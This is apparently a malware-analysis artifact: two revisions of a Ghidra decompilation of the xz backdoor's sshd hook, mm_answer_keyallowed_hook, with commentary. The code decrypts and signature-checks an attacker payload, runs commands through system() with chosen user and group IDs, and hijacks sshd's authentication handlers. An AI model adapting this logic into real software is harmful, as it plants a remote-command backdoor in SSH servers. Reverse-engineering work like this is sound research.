xzregh/108EA0_mm_answer_keyallowed_hook.c
// /home/kali/xzre-ghidra/xzregh/108EA0_mm_answer_keyallowed_hook.c
// Function: mm_answer_keyallowed_hook @ 0x108EA0
// Calling convention: __stdcall
// Prototype: int __stdcall mm_answer_keyallowed_hook(ssh * ssh, int sock, sshbuf * m)


/*
 * AutoDoc: Runs the decrypted payload state machine. It first validates `payload_state`, extracts sshbuf chunks from the monitor
 * message, and when state==0 it copies the signed header into `payload_data`, decrypts it via `secret_data_get_decrypted`,
 * and verifies the Ed448 signature against the cached host key. State 1 and 2 append additional chunks until the
 * advertised body_length is consumed, then state 3 interprets the decrypted command: copying payloads for
 * mm_answer_keyverify/mm_answer_authpassword, invoking `sshd_proxy_elevate` to run system/PAM commands, or queueing auth
 * payloads. On success it patches the monitor dispatch table to point at the attacker's hooks before tail-calling the
 * genuine `mm_answer_keyallowed`; any failure resets `payload_state` (or even exits sshd) so no partially decrypted data
 * is reused.
 */

#include "xzre_types.h"

int mm_answer_keyallowed_hook(ssh *ssh,int sock,sshbuf *m)

{
  u8 *writebuf_len_bytes;
  char payload_type;
  u32 payload_state;
  libc_imports_t *libc_imports_ref;
  sshd_ctx_t *sshd_ctx;
  sshd_monitor_func_t *orig_mm_answer_keyallowed;
  ulong sock_read_buf_len;
  sshd_ctx_t *sshd_ctx_cursor;
  void *keyverify_handler;
  u64 uid_gid_pair;
  pfn_exit_t exit_fn;
  global_context_t *ctx;
  BOOL state_ok;
  gid_t rgid;
  int iVar12;
  long loop_tmp;
  ulong copy_idx;
  ulong payload_len;
  ssize_t write_result;
  long payload_copy_idx;
  ulong payload_data_offset;
  sshd_payload_ctx_t **clear_cursor;
  u8 *payload_header_cursor;
  u8 *payload_data_cursor;
  uid_t ruid;
  ushort *payload_words;
  u8 zero_seed;
  sshbuf payload_buf;
  global_context_t *global_ctx;
  libc_imports_t *libc_imports;
  u8 payload_seed_buf[57];
  sshd_payload_ctx_t *payload_ctx;
  sshd_monitor_func_t orig_handler;
  u8 payload_header_buf[122];
  
  ctx = ::global_ctx;
  zero_seed = 0;
  if (::global_ctx == (global_context_t *)0x0) {
    return 0;
  }
  libc_imports_ref = ::global_ctx->libc_imports;
  if (libc_imports_ref == (libc_imports_t *)0x0) {
    return 0;
  }
  sshd_ctx = ::global_ctx->sshd_ctx;
  if (sshd_ctx == (sshd_ctx_t *)0x0) {
    return 0;
  }
  if (::global_ctx->payload_data == (u8 *)0x0) {
    return 0;
  }
  orig_mm_answer_keyallowed = sshd_ctx->mm_answer_keyallowed_start;
  if (orig_mm_answer_keyallowed == (sshd_monitor_func_t *)0x0) goto LAB_00109471;
  if (::global_ctx->payload_state == 4) goto LAB_0010944f;
  state_ok = check_backdoor_state(::global_ctx);
  if (((state_ok == FALSE) || (ctx->payload_state == 4)) || (ctx->payload_state == 0xffffffff))
  goto LAB_00109429;
  clear_cursor = &payload_ctx;
  for (payload_copy_idx = 0x12; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
    *(undefined4 *)clear_cursor = 0;
    clear_cursor = (sshd_payload_ctx_t **)((long)clear_cursor + (ulong)zero_seed * -8 + 4);
  }
  libc_imports = (libc_imports_t *)0x0;
  state_ok = sshbuf_extract(m,ctx,(void **)&payload_ctx,(size_t *)&orig_handler);
  if ((state_ok == FALSE) ||
     (state_ok = extract_payload_message
                         ((sshbuf *)&payload_ctx,(size_t)orig_handler,(size_t *)&libc_imports,ctx),
     state_ok == FALSE)) goto LAB_0010944f;
  decrypt_payload_message((key_payload_t *)payload_ctx,(size_t)libc_imports,ctx);
  payload_state = ctx->payload_state;
  if (payload_state == 3) {
LAB_00109216:
    payload_words = (ushort *)ctx->sshd_payload_ctx;
    if (payload_words != (ushort *)0x0) {
      payload_len = (ulong)*payload_words;
      payload_type = *(char *)((long)payload_words + 0x3b);
      payload_data_offset = payload_len - 0x120;
      if (payload_type == '\x02') {
        if ((((ctx->sshd_ctx->mm_answer_keyverify_ptr != (void *)0x0) && (4 < payload_data_offset)) &&
            (payload_data_offset = (ulong)payload_words[0x57], payload_words[0x57] != 0)) &&
           ((payload_data_offset < payload_len - 0x122 && (payload_len = (payload_len - 0x122) - payload_data_offset, 2 < payload_len)))) {
          writebuf_len_bytes = (undefined1 *)((long)payload_words + payload_data_offset + 0xb0);
          *(undefined1 *)&sshd_ctx->writebuf_size = *writebuf_len_bytes;
          *(undefined1 *)((long)&sshd_ctx->writebuf_size + 1) = writebuf_len_bytes[1];
          if ((sshd_ctx->writebuf_size == 0) || (payload_len - 2 < (ulong)sshd_ctx->writebuf_size)) {
            sshd_ctx->writebuf_size = 0;
          }
          else {
            sshd_ctx_cursor = ctx->sshd_ctx;
            libc_imports_ref = ctx->libc_imports;
            sshd_ctx->writebuf = (u8 *)((long)payload_words + payload_data_offset + 0xb2);
            keyverify_handler = sshd_ctx_cursor->mm_answer_keyverify;
            if (keyverify_handler != (void *)0x0) {
              *(void **)sshd_ctx_cursor->mm_answer_keyverify_ptr = keyverify_handler;
              write_result = fd_write(sock,payload_words + 0x58,payload_data_offset,libc_imports_ref);
              if (-1 < write_result) {
                return 0;
              }
              goto LAB_0010944f;
            }
          }
        }
      }
      else if (payload_type == '\x03') {
        if (((libc_imports_ref->system != (pfn_system_t)0x0) && (8 < payload_data_offset)) &&
           (*(char *)((long)payload_words + (payload_len - 0x73)) == '\0')) {
          uid_gid_pair = *(undefined8 *)(payload_words + 0x57);
          rgid = (gid_t)((ulong)uid_gid_pair >> 0x20);
          if (((rgid == 0) || (iVar12 = (*libc_imports_ref->setresgid)(rgid,rgid,rgid), iVar12 != -1)) &&
             ((ruid = (uid_t)uid_gid_pair, ruid == 0 ||
              (iVar12 = (*libc_imports_ref->setresuid)(ruid,ruid,ruid), iVar12 != -1)))) {
            (*libc_imports_ref->system)((char *)(payload_words + 0x5b));
            ctx->payload_state = 4;
            goto LAB_0010944f;
          }
        }
      }
      else if (((payload_type == '\x01') &&
               (ctx->sshd_ctx->mm_answer_authpassword_ptr != (sshd_monitor_func_t *)0x0)) &&
              (1 < payload_data_offset)) {
        sshd_ctx->authpayload_len_bytes[0] = (u8)payload_words[0x57];
        sshd_ctx->authpayload_len_bytes[1] = *(u8 *)((long)payload_words + 0xaf);
        if (*(ushort *)sshd_ctx->authpayload_len_bytes == 0) {
          payload_words = (ushort *)0x0;
        }
        else {
          payload_words = payload_words + 0x58;
          if (payload_len - 0x122 < (ulong)*(ushort *)sshd_ctx->authpayload_len_bytes) {
            sshd_ctx->authpayload_len_bytes[0] = '\0';
            sshd_ctx->authpayload_len_bytes[1] = '\0';
            goto LAB_00109429;
          }
        }
        sshd_ctx->pending_authpayload = (sshd_payload_ctx_t *)payload_words;
        ctx->payload_state = 4;
        state_ok = sshd_patch_variables(TRUE,FALSE,FALSE,0,ctx);
LAB_001092e5:
        if (state_ok != FALSE) goto LAB_0010944f;
      }
    }
  }
  else if ((int)payload_state < 4) {
    if (payload_state == 0) {
      if (ctx->current_data_size < 0xae) goto LAB_0010944f;
      payload_data_cursor = payload_seed_buf + 0x10;
      for (payload_copy_idx = 0x29; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
        *payload_data_cursor = '\0';
        payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
      }
      payload_data_cursor = ctx->payload_data;
      payload_seed_buf[0] = '\0';
      payload_seed_buf[1] = '\0';
      payload_seed_buf[2] = '\0';
      payload_seed_buf[3] = '\0';
      payload_seed_buf[4] = '\0';
      payload_seed_buf[5] = '\0';
      payload_seed_buf[6] = '\0';
      payload_seed_buf[7] = '\0';
      payload_seed_buf[8] = '\0';
      payload_seed_buf[9] = '\0';
      payload_seed_buf[10] = '\0';
      payload_seed_buf[0xb] = '\0';
      payload_seed_buf[0xc] = '\0';
      payload_seed_buf[0xd] = '\0';
      payload_seed_buf[0xe] = '\0';
      payload_seed_buf[0xf] = '\0';
      if (((payload_data_cursor != (u8 *)0x0) && (ctx->sshd_sensitive_data != (sensitive_data *)0x0)) &&
         ((ctx->sshd_sensitive_data->host_pubkeys != (sshkey **)0x0 &&
          (ctx->sshd_payload_ctx == (sshd_payload_ctx_t *)0x0)))) {
        ctx->sshd_payload_ctx = payload_data_cursor;
        payload_header_buf[0] = '\0';
        payload_header_buf[1] = '\0';
        payload_header_buf[2] = '\0';
        payload_header_buf[3] = '\0';
        payload_header_buf[4] = '\0';
        payload_header_buf[5] = '\0';
        payload_header_buf[6] = '\0';
        payload_header_buf[7] = '\0';
        payload_header_buf[8] = '\0';
        payload_header_buf[9] = '\0';
        payload_header_buf[10] = '\0';
        payload_header_buf[0xb] = '\0';
        payload_header_buf[0xc] = '\0';
        payload_header_buf[0xd] = '\0';
        payload_header_buf[0xe] = '\0';
        payload_header_buf[0xf] = '\0';
        payload_header_cursor = payload_header_buf + 0x10;
        for (payload_copy_idx = 0x4a; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
          *payload_header_cursor = '\0';
          payload_header_cursor = payload_header_cursor + (ulong)zero_seed * -2 + 1;
        }
        payload_copy_idx = 0;
        do {
          payload_header_buf[payload_copy_idx] = payload_data_cursor[payload_copy_idx + 2];
          payload_copy_idx = payload_copy_idx + 1;
        } while (payload_copy_idx != 0x3a);
        state_ok = secret_data_get_decrypted(payload_seed_buf,ctx);
        if ((state_ok != FALSE) &&
           (state_ok = verify_signature(ctx->sshd_sensitive_data->host_pubkeys
                                      [ctx->sshd_host_pubkey_idx],payload_header_buf,0x3a,0x5a,
                                      ctx->sshd_payload_ctx + 0x3c,payload_seed_buf,ctx), state_ok != FALSE))
        {
          ctx->payload_state = 1;
          payload_data_cursor = payload_seed_buf;
          for (payload_copy_idx = 0x39; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
            *payload_data_cursor = '\0';
            payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
          }
          state_ok = check_backdoor_state(ctx);
          goto LAB_001092e5;
        }
      }
      ctx->payload_state = 0xffffffff;
      ctx->sshd_payload_ctx = (sshd_payload_ctx_t *)0x0;
    }
    else if ((payload_state == 1) && ((ushort *)ctx->sshd_payload_ctx != (ushort *)0x0)) {
      payload_len = (ulong)*(ushort *)ctx->sshd_payload_ctx;
      payload_data_offset = ctx->current_data_size;
      if (payload_data_offset <= payload_len) {
        if (payload_data_offset != payload_len) goto LAB_0010944f;
        payload_len = ctx->payload_data_size;
        sock_read_buf_len = ctx->sock_read_buf_size;
        if ((payload_len < sock_read_buf_len) || (payload_data_offset = payload_data_offset - 0x72, payload_len - sock_read_buf_len <= payload_data_offset)) {
LAB_00109471:
          if (libc_imports_ref->exit != (pfn_exit_t)0x0) {
            (*libc_imports_ref->exit)(0);
          }
          return 0;
        }
        payload_header_buf[0] = '\0';
        payload_header_buf[1] = '\0';
        payload_header_buf[2] = '\0';
        payload_header_buf[3] = '\0';
        payload_header_buf[4] = '\0';
        payload_header_buf[5] = '\0';
        payload_header_buf[6] = '\0';
        payload_header_buf[7] = '\0';
        payload_header_buf[8] = '\0';
        payload_header_buf[9] = '\0';
        payload_header_buf[10] = '\0';
        payload_header_buf[0xb] = '\0';
        payload_header_buf[0xc] = '\0';
        payload_header_buf[0xd] = '\0';
        payload_header_buf[0xe] = '\0';
        payload_header_buf[0xf] = '\0';
        payload_data_cursor = payload_header_buf + 0x10;
        for (payload_copy_idx = 0x62; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
          *payload_data_cursor = '\0';
          payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
        }
        payload_data_cursor = ctx->payload_data;
        payload_copy_idx = 0;
        do {
          loop_tmp = payload_copy_idx + 1;
          payload_header_buf[payload_copy_idx] = payload_data_cursor[payload_copy_idx + payload_data_offset];
          payload_copy_idx = loop_tmp;
        } while (loop_tmp != 0x72);
        if ((payload_len < payload_data_offset) || (copy_idx = 0, payload_len - payload_data_offset < sock_read_buf_len)) goto LAB_00109471;
        for (; sock_read_buf_len != copy_idx; copy_idx = copy_idx + 1) {
          payload_data_cursor[copy_idx + payload_data_offset] = ctx->sock_read_buf[copy_idx];
        }
        state_ok = verify_signature(ctx->sshd_sensitive_data->host_pubkeys[ctx->sshd_host_pubkey_idx],
                                  ctx->payload_data,payload_data_offset + ctx->sock_read_buf_size,
                                  ctx->payload_data_size,payload_header_buf,ctx->sshd_payload_ctx + 2,ctx);
        if (state_ok == FALSE) {
          ctx->payload_state = 0xffffffff;
          goto LAB_00109471;
        }
        ctx->payload_state = 3;
        goto LAB_00109216;
      }
    }
  }
  else if (payload_state == 4) goto LAB_0010944f;
LAB_00109429:
  if (((ctx->libc_imports != (libc_imports_t *)0x0) &&
      (exit_fn = ctx->libc_imports->exit, exit_fn != (pfn_exit_t)0x0)) &&
     (ctx->payload_state = 0xffffffff, ctx->exit_flag != 0)) {
    (*exit_fn)(0);
  }
LAB_0010944f:
                    /* WARNING: Could not recover jumptable at 0x0010946f. Too many branches */
                    /* WARNING: Treating indirect jump as call */
  iVar12 = (*(code *)orig_mm_answer_keyallowed)(ssh,sock,m);
  return iVar12;
}



Refine sshd monitor hooks locals and refresh Ghidra exports

xzregh/108EA0_mm_answer_keyallowed_hook.c
// /home/kali/xzre-ghidra/xzregh/108EA0_mm_answer_keyallowed_hook.c
// Function: mm_answer_keyallowed_hook @ 0x108EA0
// Calling convention: __stdcall
// Prototype: int __stdcall mm_answer_keyallowed_hook(ssh * ssh, int sock, sshbuf * m)


/*
 * AutoDoc: Runs the decrypted payload state machine. It first validates `payload_state`, extracts sshbuf chunks from the monitor
 * message, and when state==0 it copies the signed header into `payload_data`, decrypts it via `secret_data_get_decrypted`,
 * and verifies the Ed448 signature against the cached host key. State 1 and 2 append additional chunks until the
 * advertised body_length is consumed, then state 3 interprets the decrypted command: copying payloads for
 * mm_answer_keyverify/mm_answer_authpassword, invoking `sshd_proxy_elevate` to run system/PAM commands, or queueing auth
 * payloads. On success it patches the monitor dispatch table to point at the attacker's hooks before tail-calling the
 * genuine `mm_answer_keyallowed`; any failure resets `payload_state` (or even exits sshd) so no partially decrypted data
 * is reused.
 */

#include "xzre_types.h"

int mm_answer_keyallowed_hook(ssh *ssh,int sock,sshbuf *m)

{
  u8 *writebuf_len_bytes;
  char payload_type;
  u32 payload_state;
  libc_imports_t *libc_imports_ref;
  sshd_ctx_t *sshd_ctx;
  sshd_monitor_func_t *orig_mm_answer_keyallowed;
  size_t sock_read_buf_len;
  sshd_ctx_t *sshd_ctx_cursor;
  sshd_monitor_func_t keyverify_handler;
  u64 uid_gid_pair;
  pfn_exit_t exit_fn;
  global_context_t *ctx;
  BOOL state_ok;
  gid_t rgid;
  int orig_call_result;
  size_t header_copy_idx;
  size_t copy_idx;
  size_t payload_len;
  ssize_t write_result;
  size_t payload_copy_idx;
  size_t payload_data_offset;
  sshd_payload_ctx_t **clear_cursor;
  u8 *payload_header_cursor;
  u8 *payload_data_cursor;
  uid_t ruid;
  ushort *payload_words;
  u8 zero_seed;
  sshbuf payload_buf;
  global_context_t *global_ctx;
  size_t payload_chunk_size;
  u8 payload_seed_buf[57];
  sshd_payload_ctx_t *payload_ctx;
  sshd_monitor_func_t orig_handler;
  u8 payload_header_buf[122];
  
  ctx = ::global_ctx;
  zero_seed = 0;
  if (::global_ctx == (global_context_t *)0x0) {
    return 0;
  }
  libc_imports_ref = ::global_ctx->libc_imports;
  if (libc_imports_ref == (libc_imports_t *)0x0) {
    return 0;
  }
  sshd_ctx = ::global_ctx->sshd_ctx;
  if (sshd_ctx == (sshd_ctx_t *)0x0) {
    return 0;
  }
  if (::global_ctx->payload_data == (u8 *)0x0) {
    return 0;
  }
  orig_mm_answer_keyallowed = sshd_ctx->mm_answer_keyallowed_start;
  if (orig_mm_answer_keyallowed == (sshd_monitor_func_t *)0x0) goto LAB_00109471;
  if (::global_ctx->payload_state == 4) goto LAB_0010944f;
  state_ok = check_backdoor_state(::global_ctx);
  if (((state_ok == FALSE) || (ctx->payload_state == 4)) || (ctx->payload_state == 0xffffffff))
  goto LAB_00109429;
  clear_cursor = &payload_ctx;
  for (payload_copy_idx = 0x12; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
    *(undefined4 *)clear_cursor = 0;
    clear_cursor = (sshd_payload_ctx_t **)((long)clear_cursor + (ulong)zero_seed * -8 + 4);
  }
  payload_chunk_size = 0;
  state_ok = sshbuf_extract(m,ctx,(void **)&payload_ctx,(size_t *)&orig_handler);
  if ((state_ok == FALSE) ||
     (state_ok = extract_payload_message
                         ((sshbuf *)&payload_ctx,(size_t)orig_handler,&payload_chunk_size,ctx),
     state_ok == FALSE)) goto LAB_0010944f;
  decrypt_payload_message((key_payload_t *)payload_ctx,payload_chunk_size,ctx);
  payload_state = ctx->payload_state;
  if (payload_state == 3) {
LAB_00109216:
    payload_words = (ushort *)ctx->sshd_payload_ctx;
    if (payload_words != (ushort *)0x0) {
      payload_len = (ulong)*payload_words;
      payload_type = *(char *)((long)payload_words + 0x3b);
      payload_data_offset = payload_len - 0x120;
      if (payload_type == '\x02') {
        if ((((ctx->sshd_ctx->mm_answer_keyverify_ptr != (void *)0x0) && (4 < payload_data_offset)) &&
            (payload_data_offset = (ulong)payload_words[0x57], payload_words[0x57] != 0)) &&
           ((payload_data_offset < payload_len - 0x122 && (payload_len = (payload_len - 0x122) - payload_data_offset, 2 < payload_len)))) {
          writebuf_len_bytes = (undefined1 *)((long)payload_words + payload_data_offset + 0xb0);
          *(undefined1 *)&sshd_ctx->writebuf_size = *writebuf_len_bytes;
          *(undefined1 *)((long)&sshd_ctx->writebuf_size + 1) = writebuf_len_bytes[1];
          if ((sshd_ctx->writebuf_size == 0) || (payload_len - 2 < (ulong)sshd_ctx->writebuf_size)) {
            sshd_ctx->writebuf_size = 0;
          }
          else {
            sshd_ctx_cursor = ctx->sshd_ctx;
            libc_imports_ref = ctx->libc_imports;
            sshd_ctx->writebuf = (u8 *)((long)payload_words + payload_data_offset + 0xb2);
            keyverify_handler = sshd_ctx_cursor->mm_answer_keyverify;
            if (keyverify_handler != (void *)0x0) {
              *(void **)sshd_ctx_cursor->mm_answer_keyverify_ptr = keyverify_handler;
              write_result = fd_write(sock,payload_words + 0x58,payload_data_offset,libc_imports_ref);
              if (-1 < write_result) {
                return 0;
              }
              goto LAB_0010944f;
            }
          }
        }
      }
      else if (payload_type == '\x03') {
        if (((libc_imports_ref->system != (pfn_system_t)0x0) && (8 < payload_data_offset)) &&
           (*(char *)((long)payload_words + (payload_len - 0x73)) == '\0')) {
          uid_gid_pair = *(undefined8 *)(payload_words + 0x57);
          rgid = (gid_t)((ulong)uid_gid_pair >> 0x20);
          if (((rgid == 0) || (orig_call_result = (*libc_imports_ref->setresgid)(rgid,rgid,rgid), orig_call_result != -1)) &&
             ((ruid = (uid_t)uid_gid_pair, ruid == 0 ||
              (orig_call_result = (*libc_imports_ref->setresuid)(ruid,ruid,ruid), orig_call_result != -1)))) {
            (*libc_imports_ref->system)((char *)(payload_words + 0x5b));
            ctx->payload_state = 4;
            goto LAB_0010944f;
          }
        }
      }
      else if (((payload_type == '\x01') &&
               (ctx->sshd_ctx->mm_answer_authpassword_ptr != (sshd_monitor_func_t *)0x0)) &&
              (1 < payload_data_offset)) {
        sshd_ctx->authpayload_len_bytes[0] = (u8)payload_words[0x57];
        sshd_ctx->authpayload_len_bytes[1] = *(u8 *)((long)payload_words + 0xaf);
        if (*(ushort *)sshd_ctx->authpayload_len_bytes == 0) {
          payload_words = (ushort *)0x0;
        }
        else {
          payload_words = payload_words + 0x58;
          if (payload_len - 0x122 < (ulong)*(ushort *)sshd_ctx->authpayload_len_bytes) {
            sshd_ctx->authpayload_len_bytes[0] = '\0';
            sshd_ctx->authpayload_len_bytes[1] = '\0';
            goto LAB_00109429;
          }
        }
        sshd_ctx->pending_authpayload = (sshd_payload_ctx_t *)payload_words;
        ctx->payload_state = 4;
        state_ok = sshd_patch_variables(TRUE,FALSE,FALSE,0,ctx);
LAB_001092e5:
        if (state_ok != FALSE) goto LAB_0010944f;
      }
    }
  }
  else if ((int)payload_state < 4) {
    if (payload_state == 0) {
      if (ctx->current_data_size < 0xae) goto LAB_0010944f;
      payload_data_cursor = payload_seed_buf + 0x10;
      for (payload_copy_idx = 0x29; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
        *payload_data_cursor = '\0';
        payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
      }
      payload_data_cursor = ctx->payload_data;
      payload_seed_buf[0] = '\0';
      payload_seed_buf[1] = '\0';
      payload_seed_buf[2] = '\0';
      payload_seed_buf[3] = '\0';
      payload_seed_buf[4] = '\0';
      payload_seed_buf[5] = '\0';
      payload_seed_buf[6] = '\0';
      payload_seed_buf[7] = '\0';
      payload_seed_buf[8] = '\0';
      payload_seed_buf[9] = '\0';
      payload_seed_buf[10] = '\0';
      payload_seed_buf[0xb] = '\0';
      payload_seed_buf[0xc] = '\0';
      payload_seed_buf[0xd] = '\0';
      payload_seed_buf[0xe] = '\0';
      payload_seed_buf[0xf] = '\0';
      if (((payload_data_cursor != (u8 *)0x0) && (ctx->sshd_sensitive_data != (sensitive_data *)0x0)) &&
         ((ctx->sshd_sensitive_data->host_pubkeys != (sshkey **)0x0 &&
          (ctx->sshd_payload_ctx == (sshd_payload_ctx_t *)0x0)))) {
        ctx->sshd_payload_ctx = payload_data_cursor;
        payload_header_buf[0] = '\0';
        payload_header_buf[1] = '\0';
        payload_header_buf[2] = '\0';
        payload_header_buf[3] = '\0';
        payload_header_buf[4] = '\0';
        payload_header_buf[5] = '\0';
        payload_header_buf[6] = '\0';
        payload_header_buf[7] = '\0';
        payload_header_buf[8] = '\0';
        payload_header_buf[9] = '\0';
        payload_header_buf[10] = '\0';
        payload_header_buf[0xb] = '\0';
        payload_header_buf[0xc] = '\0';
        payload_header_buf[0xd] = '\0';
        payload_header_buf[0xe] = '\0';
        payload_header_buf[0xf] = '\0';
        payload_header_cursor = payload_header_buf + 0x10;
        for (payload_copy_idx = 0x4a; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
          *payload_header_cursor = '\0';
          payload_header_cursor = payload_header_cursor + (ulong)zero_seed * -2 + 1;
        }
        payload_copy_idx = 0;
        do {
          payload_header_buf[payload_copy_idx] = payload_data_cursor[payload_copy_idx + 2];
          payload_copy_idx = payload_copy_idx + 1;
        } while (payload_copy_idx != 0x3a);
        state_ok = secret_data_get_decrypted(payload_seed_buf,ctx);
        if ((state_ok != FALSE) &&
           (state_ok = verify_signature(ctx->sshd_sensitive_data->host_pubkeys
                                      [ctx->sshd_host_pubkey_idx],payload_header_buf,0x3a,0x5a,
                                      ctx->sshd_payload_ctx + 0x3c,payload_seed_buf,ctx), state_ok != FALSE))
        {
          ctx->payload_state = 1;
          payload_data_cursor = payload_seed_buf;
          for (payload_copy_idx = 0x39; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
            *payload_data_cursor = '\0';
            payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
          }
          state_ok = check_backdoor_state(ctx);
          goto LAB_001092e5;
        }
      }
      ctx->payload_state = 0xffffffff;
      ctx->sshd_payload_ctx = (sshd_payload_ctx_t *)0x0;
    }
    else if ((payload_state == 1) && ((ushort *)ctx->sshd_payload_ctx != (ushort *)0x0)) {
      payload_len = (ulong)*(ushort *)ctx->sshd_payload_ctx;
      payload_data_offset = ctx->current_data_size;
      if (payload_data_offset <= payload_len) {
        if (payload_data_offset != payload_len) goto LAB_0010944f;
        payload_len = ctx->payload_data_size;
        sock_read_buf_len = ctx->sock_read_buf_size;
        if ((payload_len < sock_read_buf_len) || (payload_data_offset = payload_data_offset - 0x72, payload_len - sock_read_buf_len <= payload_data_offset)) {
LAB_00109471:
          if (libc_imports_ref->exit != (pfn_exit_t)0x0) {
            (*libc_imports_ref->exit)(0);
          }
          return 0;
        }
        payload_header_buf[0] = '\0';
        payload_header_buf[1] = '\0';
        payload_header_buf[2] = '\0';
        payload_header_buf[3] = '\0';
        payload_header_buf[4] = '\0';
        payload_header_buf[5] = '\0';
        payload_header_buf[6] = '\0';
        payload_header_buf[7] = '\0';
        payload_header_buf[8] = '\0';
        payload_header_buf[9] = '\0';
        payload_header_buf[10] = '\0';
        payload_header_buf[0xb] = '\0';
        payload_header_buf[0xc] = '\0';
        payload_header_buf[0xd] = '\0';
        payload_header_buf[0xe] = '\0';
        payload_header_buf[0xf] = '\0';
        payload_data_cursor = payload_header_buf + 0x10;
        for (payload_copy_idx = 0x62; payload_copy_idx != 0; payload_copy_idx = payload_copy_idx + -1) {
          *payload_data_cursor = '\0';
          payload_data_cursor = payload_data_cursor + (ulong)zero_seed * -2 + 1;
        }
        payload_data_cursor = ctx->payload_data;
        payload_copy_idx = 0;
        do {
          header_copy_idx = payload_copy_idx + 1;
          payload_header_buf[payload_copy_idx] = payload_data_cursor[payload_copy_idx + payload_data_offset];
          payload_copy_idx = header_copy_idx;
        } while (header_copy_idx != 0x72);
        if ((payload_len < payload_data_offset) || (copy_idx = 0, payload_len - payload_data_offset < sock_read_buf_len)) goto LAB_00109471;
        for (; sock_read_buf_len != copy_idx; copy_idx = copy_idx + 1) {
          payload_data_cursor[copy_idx + payload_data_offset] = ctx->sock_read_buf[copy_idx];
        }
        state_ok = verify_signature(ctx->sshd_sensitive_data->host_pubkeys[ctx->sshd_host_pubkey_idx],
                                  ctx->payload_data,payload_data_offset + ctx->sock_read_buf_size,
                                  ctx->payload_data_size,payload_header_buf,ctx->sshd_payload_ctx + 2,ctx);
        if (state_ok == FALSE) {
          ctx->payload_state = 0xffffffff;
          goto LAB_00109471;
        }
        ctx->payload_state = 3;
        goto LAB_00109216;
      }
    }
  }
  else if (payload_state == 4) goto LAB_0010944f;
LAB_00109429:
  if (((ctx->libc_imports != (libc_imports_t *)0x0) &&
      (exit_fn = ctx->libc_imports->exit, exit_fn != (pfn_exit_t)0x0)) &&
     (ctx->payload_state = 0xffffffff, ctx->exit_flag != 0)) {
    (*exit_fn)(0);
  }
LAB_0010944f:
                    /* WARNING: Could not recover jumptable at 0x0010946f. Too many branches */
                    /* WARNING: Treating indirect jump as call */
  orig_call_result = (*(code *)orig_mm_answer_keyallowed)(ssh,sock,m);
  return orig_call_result;
}

